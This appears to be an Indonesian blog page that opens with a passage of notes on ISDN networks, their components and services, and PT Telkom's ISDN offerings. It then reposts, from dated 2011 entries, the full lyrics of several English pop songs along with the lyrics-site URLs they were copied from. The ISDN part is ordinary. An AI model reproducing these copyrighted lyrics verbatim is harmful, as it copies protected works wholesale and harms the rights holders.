Pada masa ini, masing-masing jaringan merupakan subnetwork dari ISDN yang dilengkapi dengan sebuah set saluran dan protokol untuk mengakses ke jaringan. Pengguna terdaftar sebangai pelanggan satu jaringan dengan tetap meminta layanan yang berbeda ke sistem yang juga masih berbeda-beda, tetapi telah menggunakan akses yang sama. Hanya sistemnya saja yang masih berbeda.

3. Model jaringan ISDN penuh.
Pengguna bisa mengakses ke satu jaringan lewat satu jalur akses yang sama. Sebab sistem ISDN menyediakan dan telah dapat melayani segala jenis pelayanan yang berbeda-beda


5. KOMPONEN ISDN
sistem ISDN terdiri dari lima buah komponen terminal utama yang bertugas untuk menjalankan proses layanannya, yaitu terminal Equipment, terminal Adapter, Network Termination, Line Termination, dan Local Exchange.

6. PELAYANAN ISDN
Ada beberapa fitur layanan utama yang ditawarkan oleh sistem ISDN. Yaitu:
1. Bearer Service.
Bearer Service merupakan layanan awal dan dasar yang diperuntukkan bagi pengguna yang baru bergabung dengan jaringan ISDN. Pengguna baru akan mendapatkan layanan dasar ini begitu mendaftar sebagai pelanggan ISDN. Bearer Service menyediakan layanan transfer mode,transfer rate, dan transfer capability. Layanan ini menunjukkan dan menjelaskan karakteristik jaringan transmisi yang ditawarkan oleh operator penyedia jaringan antara terminal pengguna dan jaringan.
TeleService
2. TeleService
TeleService adalah layanan yang pada dasaranya telah diberikan dari awal oleh jaringan ISDN, namununtuk menggunakannya harus didukung dari peralatan atau terminal pengguna. Jika pengguna masih menggunakan peralatan standar, maka layanan TeleService ini tidak dapat digunakan.
3. Supplementary Service
Supplementary Service adalah layanan tambahan yang disediakan oleh jaringan ISDN ke pengguna, namun dalam mengaksesnya, pengguna dibebankan biaya tambahan ketika mengaktifkan layanan ini. Supplementary Service digunakan bersama dengan layanan dasar jaringan ISDN.

7. Aplikasi yang didukung oleh ISDNT
1. eledisket
2. PC Workgroup
3. Inter LAN
4. HiQ Fax
5. Video Conference
6. Remote Security Control
7. Bank Account Line
8. Teledoctor
9. Wide Voice
10. Back Up Line


ISDN di IndonesiaAplikasi layanan ISDN di Indonesia disediakan oleh PT Telkom. ISDN merupakan hasil evolusi dari PSTN. Proses evolusi ini dilakukan dengan pelayanan berbasis PSTN, kemudian berubah ke pelayanan SMDS, sampai akhirnya pelayanan ISDN dan Broadcast-ISDN.

Layanan ISDN di Indonesia
· Direct Dialling In.
telepon yang tersambung ke jaringan PSTN/ISDN dapat secara langsung memanggil pesawat cabang STLO.
· Call Diversion.
Pelanggan yang tidak dapat menerima panggilan dapat mengalihkan panggilannya ke nomor lain atau ke layanan penjawab (answering service)
· Do Not Disturb
Pelanggan yang memang sengaja tidak ingin menerima panggilan untuk suatu periode waktu tertentu dapat mengalihkan panggilannya ke nomor lain.
· PBX Line Hunting Service.
Seleksi otomatis dari suatu bundel saluran yang melayani pelanggan ke nomor direktori umum pelanggan tersebut.
· Three Party Service.
Pelanggan yang sedang melakukan percakapan telepon dapat menahan percakapannya dan melakukan panggilan dengan pihak ketiga.
· Freephone.
Sebuah nomor khusus dapat dialokasikan kepada pelanggan dan beban atas setiap panggilan yang dilakukan kepada nomor ini biayanya dibebankan kepada pelanggan, bukan kepada pihak yang memanggil.
· Speed Dialling.
Pelanggan dapat melakukan panggilan hanya dengan memutar suatu kode singkat atas sebuah nomor tertentu yang sudah diset dan tidak perlu memutar seluruh nomor lengkap.
· Call Waiting.
Pelanggan yang sedang melakukan percakapan diberikan tanda bahwa ada panggilan masuk lainnya.
· Centrex Service.
Layanan ini umunya hanya terdpat pada PABX dengan menggunakan sentral telepon PSTN/IDN yang diperlengkap secara khusus.
· Malicious Call Identification.
Pelanggan dapat meminta identifikasi panggilan yang diterimanya.

Sabtu, 09 Juli 2011

lady gaga ~ poker face ~

Mum mum mum mah
Mum mum mum mah

I wanna hold em' like they do in Texas please
Fold em' let em' hit me raise it baby stay with me (I love it)
Luck and intuition play the cards with Spades to start
And after he's been hooked I'll play the one that's on his heart

Oh, oh, oh, oh, ohhhh, oh-oh-e-oh-oh-oh
I'll get him hot, show him what I've got
Oh, oh, oh, oh, ohhhh, oh-oh-e-oh-oh-oh,
I'll get him hot, show him what I've got

[Chorus:]
Can't read my,
Can't read my
No he can't read my poker face
(she's got to love nobody)
Can't read my
Can't read my
No he can't read my poker face
(she's got to love nobody)

P-p-p-poker face, p-p-poker face
(Mum mum mum mah)
P-p-p-poker face, p-p-poker face
(Mum mum mum mah)

I wanna roll with him a hard pair we will be
A little gambling is fun when you're with me I love it)
Russian Roulette is not the same without a gun
And baby when it's love if its not rough it isn't fun, fun
Oh, oh, oh, oh, ohhhh, oh-oh-e-oh-oh-oh
I'll get him hot, show him what I've got
Oh, oh, oh, oh, ohhhh, oh-oh-e-oh-oh-oh,
I'll get him hot, show him what I've got

[Chorus]

P-p-p-poker face, p-p-poker face
(Mum mum mum mah)
P-p-p-poker face, p-p-poker face
(Mum mum mum mah)

I won't tell you that I love you
Kiss or hug you
Cause I'm bluffin' with my muffin
I'm not lying I'm just stunnin' with my love-glue-gunning
Just like a chick in the casino
Take your bank before I pay you out
I promise this, promise this
Check this hand cause I'm marvelous

[Chorus x3]

[x3]
P-p-p-poker face, p-p-poker face
(Mum mum mum mah)
P-p-p-poker face, p-p-poker face
(Mum mum mum mah)

james morrison ~ you give me something ~

You want to stay with me in the morning
You only hold me when I sleep
I was meant to tread the water
Now I've gotten in too deep
For every piece of me that wants you
Another piece backs away

'Cause you give me something
That makes me scared, alright
This could be nothing
But I'm willing to give it a try
Please give me something
'Cause someday I might know my heart

You already waited up for hours
Just to spend a little time alone with me
And I can say I've never bought you flowers
I can't work out what they mean
I never thought that I'd love someone
That was someone else's dream

'Cause you give me something
That makes me scared, alright
[From: http://www.elyrics.net/read/j/james-morrison-lyrics/you-give-me-something-lyrics.html]
This could be nothing
But I'm willing to give it a try
Please give me something
'Cause someday I might call you from my heart

But it might me a second too late
And the words that I could never say
Gonna come out anyway

'Cause you give me something
That makes me scared, alright
This could be nothing
But I'm willing to give it a try
Please give me something

'Cause you give me something
That makes me scared, alright
This could be nothing
But I'm willing to give it a try
Please give me something
'Cause someday I might know my heart
Know my heart, know my heart, know my heart

only love can break your heart

When you were young
and on your own
How did it feel
to be alone?
I was always thinking
of games that I was playing.
Trying to make
the best of my time.

But only love
can break your heart
Try to be sure
right from the start
Yes only love
can break your heart
What if your world
should fall apart?

I have a friend
I've never seen
He hides his head
inside a dream
Someone should call him
and see if he can come out.
Try to lose
the down that he's found.

But only love
can break your heart
Try to be sure
right from the start
Yes only love
can break your heart
What if your world
should fall apart?

I have a friend
I've never seen
He hides his head
inside a dream
Yes, only love
can break your heart
Yes, only love
can break your heart

Jumat, 08 Juli 2011

bruno mars lazy song

Today I don't feel like doing anything
I just wanna lay in my bed
Don't feel like picking up my phone, so leave a message at the tone
'Cause today I swear I'm not doing anything

I'm gonna kick my feet up then stare at the fan
Turn the TV on, throw my hand in my pants
Nobody's gon' tell me I can't

I'll be lounging on the couch just chilling in my Snuggie
Click to MTV so they can teach me how to dougie
'Cause in my castle I'm the freaking man

Oh yes, I said it, I said it
I said it 'cause I can

Today I don't feel like doing anything
I just wanna lay in my bed
Don't feel like picking up my phone, so leave a message at the tone
'Cause today I swear I'm not doing anything
Nothing at all, nothing at all

Tomorrow I'll wake up, do some P90X
Find a really nice girl, have some really nice sex
And she's gonna scream out
[ From: http://www.elyrics.net/read/b/bruno-mars-lyrics/the-lazy-song-lyrics.html ]
This is great
(Oh my god, this is great)

Yeah, I might mess around
And get my college degree
I bet my old man will be so proud of me
But sorry pops, you'll just have to wait

Oh yes, I said it, I said it
I said it 'cause I can

Today I don't feel like doing anything
I just wanna lay in my bed
Don't feel like picking up my phone, so leave a message at the tone
'Cause today I swear I'm not doing anything

No, I ain't gonna comb my hair
'Cause I ain't going anywhere
No, no, no, no, no, no, no, no, no

I'll just strut in my birthday suit
And let everything hang loose
Yeah, yeah, yeah, yeah, yeah
Yeah, yeah, yeah, yeah, yeah, yeah

Oh, today I don't feel like doing anything
I just wanna lay in my bed
Don't feel like picking up my phone, so leave a message at the tone
'Cause today I swear I'm not doing anything

Nothing at all
Nothing at all
Nothing at all

bruno mars - just the way you are

[Verse 1]
Her eyes, her eyes
make the stars look like they're not shining
Her hair, her hair
falls perfectly without her trying
She's so beautiful
And I tell her everyday (yeahh)

I know, I know
When I compliment her she won't believe me
And it's so, it's so
Sad to think that she don't see what I see
But everytime she asks me "Do I look okay?"
I say

[Chorus:]
When I see your face
There's not a thing that I would change
'Cause you're amazing
Just the way you are
And when you smile
The whole world stops and stares for a while
'Cause girl you're amazing
Just the way you are

[Verse 2]
Her lips, her lips
I could kiss them all day if she'd let me
Her laugh, her laugh
she hates but I think it's so sexy
She's so beautiful
And I tell her everyday

Oh you know, you know, you know
I'd never ask you to change
If perfect's what you're searching for
Then just stay the same
So don't even bother asking if you look okay
'Cause you know I'll say

[Chorus:]
When I see your face
There's not a thing that I would change
'Cause you're amazing
Just the way you are
And when you smile
The whole world stops and stares for a while
'Cause girl you're amazing
Just the way you are

The way you are
The way you are
Girl you're amazing
Just the way you are

[Chorus:]
When I see your face
There's not a thing that I would change
Cause you're amazing
Just the way you are
And when you smile
The whole world stops and stares for awhile
Cause girl you're amazing
Just the way you are

Travie McCoy Feat, Bruno Mars Billionaire

[Bruno Mars]
I wanna be a billionaire so frickin bad
Buy all of the things I never had
Uh, I wanna be on the cover of Forbes magazine
Smiling next to Oprah and the Queen

[Chorus]
Oh every time I close my eyes
I see my name in shining lights yeahh
A different city every night oh
I swear the world better prepare
For when I'm a billionaire

[Travis "Travie" McCoy]
Yeah I would have a show like Oprah
I would be the host of, everyday Christmas
Give Travie a wish list
I'd probably pull an Angelina and Brad Pitt
Give away a few like here lady have this
And last but not least grant somebody their last wish
It's been a couple months since I've been single so
You can call me Travie Claus minus the Ho Ho
Get it, hehe, I'd probably visit where Katrina hit
And yea sure do a lot more than me did
Yeah can't forget about me stupid
Everywhere I go Imma have my own theme music
[ Lyrics from: http://www.lyricsmode.com/lyrics/t/travie_mccoy_feat_bruno_mars/billionaire.html ]
[Chorus]
Oh every time I close my eyes
I see my name in shining lights yeahh
A different city every night oh
I swear the world better prepare
For when I'm a billionaire
Oh oooh oh oooh for when I'm a Billionaire
Oh oooh oh oooh when I'm a Billionaire

[Travis "Travie" McCoy]
I'll be playing basketball with the President
Dunking on his delegates
Then I'll compliment him on his political etiquette
Toss a couple milli in the air just for the heck of it
But keep the fives, twenties, tens, and Bens completely seperate
And yeah I'll be in a whole new tax bracket
We in recession but let me take a crack at it
I'll probably take whatever's left and just split it up
So everybody that I love can have a couple bucks
And not a single tummy around me would know what hungry was
Eating good sleeping soundly
I know we all have a similar dream
Go in your pocket pull out your wallet
And put it in the air and sing

[Bruno Mars]
I wanna be a billionaire so freaking bad
Buy all of the things I never had
Uh, I wanna be on the cover of Forbes magazine
Smiling next to Oprah and the Queen

[Chorus]
Oh every time I close my eyes
I see my name in shining lights yeahh
A different city every night oh
I swear the world better prepare
For when I'm a billionaire
Oh oooh oh oooh for when I'm a Billionaire
Oh oooh oh oooh for when I'm a Billionaire

I wanna be a billionaire so freaking bad.

More lyrics: http://www.lyricsmode.com/lyrics/t/travie_mccoy_feat_bruno_mars/#share

the time black eyed peas lyrics

I’ve had the time of my life
And I’ve never felt this way before
And I swear this is true
And I owe it all to you

(Fergie)

I’ve had the time of my life
And I’ve never felt this way before
And I swear this is true
And I owe it all to you
You-you-you-you-you
You-you-you-you-you
You-you-you-you-you-you-y-y-y-y-you

Dirty bit
Dirty bit

(will.i.am)

I-I came up in here to rock
Light a fire, make it hot
I don’t wanna take no pictures
I just wanna take some shots
So come on, let’s go
Let’s lose control
Let’s do it all night
‘Til we can’t do it no mo’

People rockin’ to the sound
Turn it up and watch it pound
We gon’ rock it to the top
Until the roof come burnin’ down
Yeah, it’s hot in herrre
The temperaturrre
Has got these ladies
Gettin’ freakierrr

(Fergie)

I got freaky, freaky, baby
I was chillin’ with my ladies
I didn’t come to get bougie
I came here to get crazy
I was born to get wiiild
That’s my styyyle
If you didn’t know that
Well, baby, now you know now

‘Cause I’m!
Havin’!
A good! Time!
With you!
I’m tellin’ you

I’ve had the time of my life
And I’ve never felt this way before
And I swear this is true
And I owe it all to you

I’ve had the time of my life
And I’ve never felt this way before
And I swear this is true
Black Eyed Peas The Time lyrics found on http://www.directlyrics.com/black-eyed-peas-the-time-lyrics.html

And I owe it all to you
You-you-you-you-you
You-you-you-you-you
You-you-you-you-you-you-y-y-y-y-you

Dirty bit
Dirty bit

(Taboo)

All-all these girls, they like my swagger
They callin’ me Mick Jagger
I be rollin’ like a Stone
Jet-setter, jet-lagger
We ain’t messin’ with no maggots
Messin’ with the baddest
Chicks in the club
Honey, what’s up?

(apl.de.ap)

Mirror, mirror on the wall
Who’s the baddest of them all?
Yeah, it’s gotta be the apl
I’m the mack daddy, y’all
Haters better step back
Ladies (don’t load your act)
I’m the party application
Rockin’ just like that

(This is international)
(Big mega radio smasher)

‘Cause I’m!
Havin’!
A good! Time!
With you!
I’m tellin’ you

I-I-I-I’ve had
The time of my li-i-ife
And I’ve never felt this way before-fore
And I swear-wear
This is tru-u-ue
And I owe it all to you-ou

Oh, I-I-I-I’ve had
The time of my li-i-i-ow
And I’ve never felt this way before-fore
And I swear-wear
This is tru-u-ue
And I owe it all to you-ou

I-I-I-I’ve had
The time of my li-i-ife
And I’ve never felt this way before-fore
And I swear-wear
This is tru-u-ue
And I owe it all to you-ou

Oh, I-I-I-I’ve had
The time of my li-i-i-ow
And I’ve never felt this way before-fore
And I swear-wear
This is tru-u-ue
And I owe it all to you-ou

Dirty bit!

firework - katy perry

Do you ever feel like a plastic bag,
drifting through the wind
wanting to start again?
Do you ever feel, feel so paper thin
like a house of cards,
one blow from caving in?

Do you ever feel already buried deep?
6 feet under screams but no one seems to hear a thing
Do you know that there's still a chance for you
'Cause there's a spark in you

You just gotta ignite, the light, and let it shine
Just own the night like the 4th of July

'Cause baby you're a firework
Come on, show 'em what you're worth
Make 'em go "Oh, oh, oh"
As you shoot across the sky-y-y

Baby, you're a firework
Come on, let your colors burst
Make 'em go "Oh, oh, oh"
You're gonna leave 'em falling down-own-own

You don't have to feel like a waste of space
You're original, cannot be replaced
If you only knew what the future holds
After a hurricane comes a rainbow

Maybe your reason why all the doors are closed
So you could open one that leads you to the perfect road
Like a lightning bolt, your heart will blow
And when it's time, you'll know

You just gotta ignite, the light, and let it shine
Just own the night like the 4th of July

'Cause baby you're a firework
Come on, show 'em what you're worth
Make 'em go "Oh, oh, oh"
As you shoot across the sky-y-y

Baby, you're a firework
Come on, let your colors burst
Make 'em go "Oh, Oh, Oh"
You're gonna leave 'em falling down-own-own

Boom, boom, boom
Even brighter than the moon, moon, moon
It's always been inside of you, you, you
And now it's time to let it through-ough-ough

'Cause baby you're a firework
Come on, show 'em what you're worth
Make 'em go "Oh, Oh, Oh"
As you shoot across the sky-y-y

Baby, you're a firework
Come on, let your colors burst
Make 'em go "Oh, Oh, Oh"
You're gonna leave 'em falling down-own-own

Boom, boom, boom
Even brighter than the moon, moon, moon
Boom, boom, boom
Even brighter than the moon, moon, moon